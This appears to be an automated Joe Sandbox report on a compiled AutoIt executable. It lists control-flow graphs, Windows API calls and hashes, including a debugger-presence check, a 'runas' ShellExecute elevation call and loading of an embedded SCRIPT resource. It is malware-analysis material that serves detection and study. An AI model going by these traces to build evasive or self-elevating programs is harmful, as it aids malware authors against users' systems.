761ffa 89255->89258 89257->89254 89262 73d37a 60 API calls 89257->89262 89258->89254 89263 73d37a 60 API calls 89258->89263 89260->89224 89261->89227 89262->89257 89263->89258 89264->89241 89266 76a5ee 89265->89266 89267 76a4ec 89265->89267 89266->89127 89269 76a5d4 Mailbox 89267->89269 89270 76a58b 89267->89270 89272 76a4fd 89267->89272 89268 73f4ea 48 API calls 89284 76a54c _memcpy_s Mailbox 89268->89284 89269->89268 89271 73f4ea 48 API calls 89270->89271 89271->89284 89273 73f4ea 48 API calls 89272->89273 89282 76a51a 89272->89282 89273->89282 89274 76a555 89278 73f4ea 48 API calls 89274->89278 89275 76a545 89277 73f4ea 48 API calls 89275->89277 89276 73f4ea 48 API calls 89276->89266 89277->89284 89279 76a55b 89278->89279 89285 769d2d 48 API calls 89279->89285 89281 76a567 89286 73e65e 50 API calls 89281->89286 89282->89274 89282->89275 89282->89284 89284->89276 89285->89281 89286->89284 89287->89149 89288->89142 89289 799c06 89300 73d3be 89289->89300 89291 799c1c 89292 799c91 Mailbox 89291->89292 89309 721caa 49 API calls 89291->89309 89295 733200 332 API calls 89292->89295 89294 799c71 89297 799cc5 89294->89297 89310 76b171 48 API calls 89294->89310 89295->89297 89298 79a7ab Mailbox 89297->89298 89311 76cc5c 87 API calls 4 library calls 89297->89311 89301 73d3ca 89300->89301 89302 73d3dc 89300->89302 89312 72dcae 50 API calls Mailbox 89301->89312 89304 73d3e2 89302->89304 89305 73d40b 89302->89305 89306 73f4ea 48 API calls 89304->89306 89313 72dcae 50 API calls Mailbox 89305->89313 89308 73d3d4 89306->89308 89308->89291 89309->89294 89310->89292 89311->89298 89312->89308 89313->89308

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 957 74b043-74b080 call 74f8a0 960 74b082-74b084 957->960 961 74b089-74b08b 957->961 962 74b860-74b86c call 74a70c 960->962 963 74b0ac-74b0d9 961->963 964 74b08d-74b0a7 call 747bda call 747c0e call 746e10 961->964 965 74b0e0-74b0e7 963->965 966 74b0db-74b0de 963->966 964->962 970 74b105 965->970 971 74b0e9-74b100 call 747bda call 747c0e call 746e10 965->971 966->965 969 74b10b-74b110 966->969 975 74b112-74b11c call 74f82f 969->975 976 74b11f-74b12d call 753bf2 969->976 970->969 1006 74b851-74b854 971->1006 975->976 987 74b133-74b145 976->987 988 74b44b-74b45d 976->988 987->988 990 74b14b-74b183 call 747a0d GetConsoleMode 987->990 991 74b463-74b473 988->991 992 74b7b8-74b7d5 WriteFile 988->992 990->988 1010 74b189-74b18f 990->1010 995 74b479-74b484 991->995 996 74b55a-74b55f 991->996 998 74b7d7-74b7df 992->998 999 74b7e1-74b7e7 GetLastError 992->999 1004 74b48a-74b49a 995->1004 1005 74b81b-74b833 995->1005 1001 74b565-74b56e 996->1001 1002 74b663-74b66e 996->1002 1000 74b7e9 998->1000 999->1000 1007 74b7ef-74b7f1 1000->1007 1001->1005 1008 74b574 1001->1008 1002->1005 1014 74b674 1002->1014 1011 74b4a0-74b4a3 1004->1011 1012 74b835-74b838 1005->1012 1013 74b83e-74b84e call 747c0e call 747bda 1005->1013 1009 74b85e-74b85f 1006->1009 1017 74b856-74b85c 1007->1017 1018 74b7f3-74b7f5 1007->1018 1019 74b57e-74b595 1008->1019 1009->962 1020 74b191-74b193 1010->1020 1021 74b199-74b1bc GetConsoleCP 1010->1021 1022 74b4a5-74b4be 1011->1022 1023 74b4e9-74b520 WriteFile 1011->1023 1012->1013 1024 74b83a-74b83c 1012->1024 1013->1006 1015 74b67e-74b693 1014->1015 1025 74b699-74b69b 1015->1025 1017->1009 1018->1005 1027 74b7f7-74b7fc 1018->1027 1028 74b59b-74b59e 1019->1028 1020->988 1020->1021 1029 74b440-74b446 1021->1029 1030 74b1c2-74b1ca 1021->1030 1031 74b4c0-74b4ca 1022->1031 1032 74b4cb-74b4e7 1022->1032 1023->999 1033 74b526-74b538 1023->1033 1024->1009 1035 74b69d-74b6b3 1025->1035 1036 74b6d8-74b719 WideCharToMultiByte 1025->1036 1038 74b812-74b819 call 747bed 1027->1038 1039 74b7fe-74b810 call 747c0e call 747bda 1027->1039 1040 74b5a0-74b5b6 1028->1040 1041 74b5de-74b627 WriteFile 1028->1041 1029->1018 1042 74b1d4-74b1d6 1030->1042 1031->1032 1032->1011 1032->1023 1033->1007 1034 74b53e-74b54f 1033->1034 1034->1004 1043 74b555 1034->1043 1044 74b6b5-74b6c4 1035->1044 1045 74b6c7-74b6d6 1035->1045 1036->999 1047 74b71f-74b721 1036->1047 1038->1006 1039->1006 1049 74b5cd-74b5dc 1040->1049 1050 74b5b8-74b5ca 1040->1050 1041->999 1052 74b62d-74b645 1041->1052 1053 74b1dc-74b1fe 1042->1053 1054 74b36b-74b36e 1042->1054 1043->1007 1044->1045 1045->1025 1045->1036 1057 74b727-74b75a WriteFile 1047->1057 1049->1028 1049->1041 1050->1049 1052->1007 1060 74b64b-74b658 1052->1060 1061 74b217-74b223 call 741688 1053->1061 1062 74b200-74b215 1053->1062 1055 74b375-74b3a2 1054->1055 1056 74b370-74b373 1054->1056 1064 74b3a8-74b3ab 1055->1064 1056->1055 1056->1064 1065 74b75c-74b776 1057->1065 1066 74b77a-74b78e GetLastError 1057->1066 1060->1019 1068 74b65e 1060->1068 1077 74b225-74b239 1061->1077 1078 74b269-74b26b 1061->1078 1069 74b271-74b283 call 7540f7 1062->1069 1071 74b3b2-74b3c5 call 755884 1064->1071 1072 74b3ad-74b3b0 1064->1072 1065->1057 1073 74b778 1065->1073 1076 74b794-74b796 1066->1076 1068->1007 1087 74b435-74b43b 1069->1087 1088 74b289 1069->1088 1071->999 1091 74b3cb-74b3d5 1071->1091 1072->1071 1079 74b407-74b40a 1072->1079 1073->1076 1076->1000 1082 74b798-74b7b0 1076->1082 1084 74b412-74b42d 1077->1084 1085 74b23f-74b254 call 7540f7 1077->1085 1078->1069 1079->1042 1083 74b410 1079->1083 1082->1015 1089 74b7b6 1082->1089 1083->1087 1084->1087 1085->1087 1097 74b25a-74b267 1085->1097 1087->1000 1092 74b28f-74b2c4 WideCharToMultiByte 1088->1092 1089->1007 1094 74b3d7-74b3ee call 755884 1091->1094 1095 74b3fb-74b401 1091->1095 1092->1087 1096 74b2ca-74b2f0 WriteFile 1092->1096 1094->999 1103 74b3f4-74b3f5 1094->1103 1095->1079 1096->999 1099 74b2f6-74b30e 1096->1099 1097->1092 1099->1087 1101 74b314-74b31b 1099->1101 1101->1095 1102 74b321-74b34c WriteFile 1101->1102 1102->999 1104 74b352-74b359 1102->1104 1103->1095 1104->1087 1105 74b35f-74b366 1104->1105 1105->1095
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4e69dc3c056a1399cd3579d7ee74f36eff944edf334487be50bb005bb0df7a2c
                                                                                • Instruction ID: 03927a1ab057019db097a5c0f157eda2e9b94678642973e8c7ea27a334c02464
                                                                                • Opcode Fuzzy Hash: 4e69dc3c056a1399cd3579d7ee74f36eff944edf334487be50bb005bb0df7a2c
                                                                                • Instruction Fuzzy Hash: 33325E75B02268CBDB258F58DC856E9B7B5FF4A310F1840D9E40AA7A91D7389E80CF52

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00723AA3,?), ref: 00723D45
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,00723AA3,?), ref: 00723D57
                                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,007E1148,007E1130,?,?,?,?,00723AA3,?), ref: 00723DC8
                                                                                  • Part of subcall function 00726430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00723DEE,007E1148,?,?,?,?,?,00723AA3,?), ref: 00726471
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,00723AA3,?), ref: 00723E48
                                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007D28F4,00000010), ref: 00791CCE
                                                                                • SetCurrentDirectoryW.KERNEL32(?,007E1148,?,?,?,?,?,00723AA3,?), ref: 00791D06
                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007BDAB4,007E1148,?,?,?,?,?,00723AA3,?), ref: 00791D89
                                                                                • ShellExecuteW.SHELL32(00000000,?,?,?,?,00723AA3), ref: 00791D90
                                                                                  • Part of subcall function 00723E6E: GetSysColorBrush.USER32(0000000F), ref: 00723E79
                                                                                  • Part of subcall function 00723E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00723E88
                                                                                  • Part of subcall function 00723E6E: LoadIconW.USER32(00000063), ref: 00723E9E
                                                                                  • Part of subcall function 00723E6E: LoadIconW.USER32(000000A4), ref: 00723EB0
                                                                                  • Part of subcall function 00723E6E: LoadIconW.USER32(000000A2), ref: 00723EC2
                                                                                  • Part of subcall function 00723E6E: RegisterClassExW.USER32(?), ref: 00723F30
                                                                                  • Part of subcall function 007236B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007236E6
                                                                                  • Part of subcall function 007236B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00723707
                                                                                  • Part of subcall function 007236B8: ShowWindow.USER32(00000000,?,?,?,?,00723AA3,?), ref: 0072371B
                                                                                  • Part of subcall function 007236B8: ShowWindow.USER32(00000000,?,?,?,?,00723AA3,?), ref: 00723724
                                                                                  • Part of subcall function 00724FFC: _memset.LIBCMT ref: 00725022
                                                                                  • Part of subcall function 00724FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007250CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                • String ID: ()}$This is a third-party compiled AutoIt script.$runas
                                                                                • API String ID: 438480954-2475759540
                                                                                • Opcode ID: e09ecc1c8114176227d564ca55571a59c3d7fe220efba81d45977588136bfaed
                                                                                • Instruction ID: 678146aa9afb7fccfdb6fefc8eed2315b8ba7ae17340a7618e49e33ee625d5a2
                                                                                • Opcode Fuzzy Hash: e09ecc1c8114176227d564ca55571a59c3d7fe220efba81d45977588136bfaed
                                                                                • Instruction Fuzzy Hash: AB514C30E0529DEECF11EBB0FC4AEED7B799F59700F408069F50266192DA7C4A4ACB21

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1354 73ddc0-73de4f call 72d7f7 GetVersionExW call 726a63 call 73dfb4 call 726571 1363 7924c8-7924cb 1354->1363 1364 73de55-73de56 1354->1364 1365 7924cd 1363->1365 1366 7924e4-7924e8 1363->1366 1367 73de92-73dea2 call 73df77 1364->1367 1368 73de58-73de63 1364->1368 1369 7924d0 1365->1369 1370 7924ea-7924f3 1366->1370 1371 7924d3-7924dc 1366->1371 1381 73dec7-73dee1 1367->1381 1382 73dea4-73dec1 GetCurrentProcess call 73df5f 1367->1382 1372 79244e-792454 1368->1372 1373 73de69-73de6b 1368->1373 1369->1371 1370->1369 1377 7924f5-7924f8 1370->1377 1371->1366 1375 79245e-792464 1372->1375 1376 792456-792459 1372->1376 1378 792469-792475 1373->1378 1379 73de71-73de74 1373->1379 1375->1367 1376->1367 1377->1371 1383 79247f-792485 1378->1383 1384 792477-79247a 1378->1384 1385 73de7a-73de89 1379->1385 1386 792495-792498 1379->1386 1388 73dee3-73def7 call 73e00c 1381->1388 1389 73df31-73df3b GetSystemInfo 1381->1389 1382->1381 1405 73dec3 1382->1405 1383->1367 1384->1367 1390 79248a-792490 1385->1390 1391 73de8f 1385->1391 1386->1367 1392 79249e-7924b3 1386->1392 1402 73df29-73df2f GetSystemInfo 1388->1402 1403 73def9-73df01 call 73dff4 GetNativeSystemInfo 1388->1403 1394 73df0e-73df1a 1389->1394 1390->1367 1391->1367 1396 7924bd-7924c3 1392->1396 1397 7924b5-7924b8 1392->1397 1398 73df21-73df26 1394->1398 1399 73df1c-73df1f FreeLibrary 1394->1399 1396->1367 1397->1367 1399->1398 1404 73df03-73df07 1402->1404 1403->1404 1404->1394 1408 73df09-73df0c FreeLibrary 1404->1408 1405->1381 1408->1394
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?), ref: 0073DDEC
                                                                                • GetCurrentProcess.KERNEL32(00000000,007BDC38,?,?), ref: 0073DEAC
                                                                                • GetNativeSystemInfo.KERNELBASE(?,007BDC38,?,?), ref: 0073DF01
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0073DF0C
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0073DF1F
                                                                                • GetSystemInfo.KERNEL32(?,007BDC38,?,?), ref: 0073DF29
                                                                                • GetSystemInfo.KERNEL32(?,007BDC38,?,?), ref: 0073DF35
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                • String ID:
                                                                                • API String ID: 3851250370-0
                                                                                • Opcode ID: 58c7493fe5a7e20c17b0df3886816ec4cda1f659c675cba9d92a6bfe861f62f0
                                                                                • Instruction ID: cd883200ef337948b737cdd904e488a614c0629b77c251b198aef5114b1fb4e5
                                                                                • Opcode Fuzzy Hash: 58c7493fe5a7e20c17b0df3886816ec4cda1f659c675cba9d92a6bfe861f62f0
                                                                                • Instruction Fuzzy Hash: 99619FB180A2C4DBDF25DF68A8C15E97FB46F29300F1989D9D8459F207C7388E09CB66

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1426 72406b-724083 CreateStreamOnHGlobal 1427 7240a3-7240a6 1426->1427 1428 724085-72409c FindResourceExW 1426->1428 1429 7240a2 1428->1429 1430 794f16-794f25 LoadResource 1428->1430 1429->1427 1430->1429 1431 794f2b-794f39 SizeofResource 1430->1431 1431->1429 1432 794f3f-794f4a LockResource 1431->1432 1432->1429 1433 794f50-794f6e 1432->1433 1433->1429
                                                                                APIs
                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0072449E,?,?,00000000,00000001), ref: 0072407B
                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0072449E,?,?,00000000,00000001), ref: 00724092
                                                                                • LoadResource.KERNEL32(?,00000000,?,?,0072449E,?,?,00000000,00000001,?,?,?,?,?,?,007241FB), ref: 00794F1A
                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,0072449E,?,?,00000000,00000001,?,?,?,?,?,?,007241FB), ref: 00794F2F
                                                                                • LockResource.KERNEL32(0072449E,?,?,0072449E,?,?,00000000,00000001,?,?,?,?,?,?,007241FB,00000000), ref: 00794F42
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                • String ID: SCRIPT
                                                                                • API String ID: 3051347437-3967369404
                                                                                • Opcode ID: 29d9594f246ac9c9d000399e3559f6ae2d92eaa2e0fc55c3b613151282b01201
                                                                                • Instruction ID: a399dfafe654b460f44da742efa74ca06a5954ae5a69847a8c1269606bc29023
                                                                                • Opcode Fuzzy Hash: 29d9594f246ac9c9d000399e3559f6ae2d92eaa2e0fc55c3b613151282b01201
                                                                                • Instruction Fuzzy Hash: E8112A71200711AFE7318B65EC48F677BB9EBCAB51F24816CF6029A6A0DB75DC40CA30
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                • String ID: @$ ~$ ~$ ~
                                                                                • API String ID: 3728558374-2924008549
                                                                                • Opcode ID: 146748ad34c13509218a7832af5f81940203d52a0165729b7ab95e45f542a5cd
                                                                                • Instruction ID: 7cf8368c0e22149825667c4075f0e53b614dcb673340acea9bb939bbba10a50a
                                                                                • Opcode Fuzzy Hash: 146748ad34c13509218a7832af5f81940203d52a0165729b7ab95e45f542a5cd
                                                                                • Instruction Fuzzy Hash: 5D729F71E04209DFEF28DF94C485ABEB7B5FF48300F14805AE905AB292D779AE45CB91
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?,00792F49), ref: 00766CB9
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 00766CCA
                                                                                • FindClose.KERNEL32(00000000), ref: 00766CDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                • String ID:
                                                                                • API String ID: 48322524-0
                                                                                • Opcode ID: c24add0325c8bb1222210387320fef5e6dcb60f767c02d47014f03669ed63b4b
                                                                                • Instruction ID: cab30ab517e0388d3b370c075d49ec762476fa1e57a091cbc83305da60e237f8
                                                                                • Opcode Fuzzy Hash: c24add0325c8bb1222210387320fef5e6dcb60f767c02d47014f03669ed63b4b
                                                                                • Instruction Fuzzy Hash: 9CE0D83581081497C2206738EC0D4E9376CDB4A339F508706F973C11D0EB78ED0095E9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: ~
                                                                                • API String ID: 3964851224-3322473477
                                                                                • Opcode ID: 108468da8d442a273df3ba56940bd1d1b45c568bda082408b326bd1c6566ed3e
                                                                                • Instruction ID: 1e46cc0c350847673e95742da3add4bf64cacc1a14558c17f19cfbaeb0528229
                                                                                • Opcode Fuzzy Hash: 108468da8d442a273df3ba56940bd1d1b45c568bda082408b326bd1c6566ed3e
                                                                                • Instruction Fuzzy Hash: 59925870608341DFEB24DF18C484B6ABBE5BF88304F14885DF99A8B262D779ED45CB52
                                                                                APIs
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0072E959
                                                                                • timeGetTime.WINMM ref: 0072EBFA
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0072ED2E
                                                                                • TranslateMessage.USER32(?), ref: 0072ED3F
                                                                                • DispatchMessageW.USER32(?), ref: 0072ED4A
                                                                                • LockWindowUpdate.USER32(00000000), ref: 0072ED79
                                                                                • DestroyWindow.USER32 ref: 0072ED85
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0072ED9F
                                                                                • Sleep.KERNEL32(0000000A), ref: 00795270
                                                                                • TranslateMessage.USER32(?), ref: 007959F7
                                                                                • DispatchMessageW.USER32(?), ref: 00795A05
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00795A19
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                • API String ID: 2641332412-570651680
                                                                                • Opcode ID: b0f08b30ffe900ca997add00c8aab7d5f36e04574e9342f4a7af4a743640c806
                                                                                • Instruction ID: 72fd7ecd1054197838eb6e72d9d13ac14ede7f4f6e52fab18ec4960fef85a1f4
                                                                                • Opcode Fuzzy Hash: b0f08b30ffe900ca997add00c8aab7d5f36e04574e9342f4a7af4a743640c806
                                                                                • Instruction Fuzzy Hash: F862C470504390DFEB25DF24E889BAA77E4BF54304F04496DF9868B292DB7DE844CB62
                                                                                APIs
                                                                                • ___createFile.LIBCMT ref: 00755EC3
                                                                                • ___createFile.LIBCMT ref: 00755F04
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00755F2D
                                                                                • __dosmaperr.LIBCMT ref: 00755F34
                                                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00755F47
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00755F6A
                                                                                • __dosmaperr.LIBCMT ref: 00755F73
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00755F7C
                                                                                • __set_osfhnd.LIBCMT ref: 00755FAC
                                                                                • __lseeki64_nolock.LIBCMT ref: 00756016
                                                                                • __close_nolock.LIBCMT ref: 0075603C
                                                                                • __chsize_nolock.LIBCMT ref: 0075606C
                                                                                • __lseeki64_nolock.LIBCMT ref: 0075607E
                                                                                • __lseeki64_nolock.LIBCMT ref: 00756176
                                                                                • __lseeki64_nolock.LIBCMT ref: 0075618B
                                                                                • __close_nolock.LIBCMT ref: 007561EB
                                                                                  • Part of subcall function 0074EA9C: CloseHandle.KERNELBASE(00000000,007CEEF4,00000000,?,00756041,007CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0074EAEC
                                                                                  • Part of subcall function 0074EA9C: GetLastError.KERNEL32(?,00756041,007CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0074EAF6
                                                                                  • Part of subcall function 0074EA9C: __free_osfhnd.LIBCMT ref: 0074EB03
                                                                                  • Part of subcall function 0074EA9C: __dosmaperr.LIBCMT ref: 0074EB25
                                                                                  • Part of subcall function 00747C0E: __getptd_noexit.LIBCMT ref: 00747C0E
                                                                                • __lseeki64_nolock.LIBCMT ref: 0075620D
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00756342
                                                                                • ___createFile.LIBCMT ref: 00756361
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0075636E
                                                                                • __dosmaperr.LIBCMT ref: 00756375
                                                                                • __free_osfhnd.LIBCMT ref: 00756395
                                                                                • __invoke_watson.LIBCMT ref: 007563C3
                                                                                • __wsopen_helper.LIBCMT ref: 007563DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                • String ID: @
                                                                                • API String ID: 3896587723-2766056989
                                                                                • Opcode ID: 8a14c52ba328cd37fa8c864a6455e94f1c3b071528609dd012c05e58450f9e4c
                                                                                • Instruction ID: 9f2bc62d16e91971b6d044ba7f9a9effa98600dbedc1f678c180e7e717f460e8
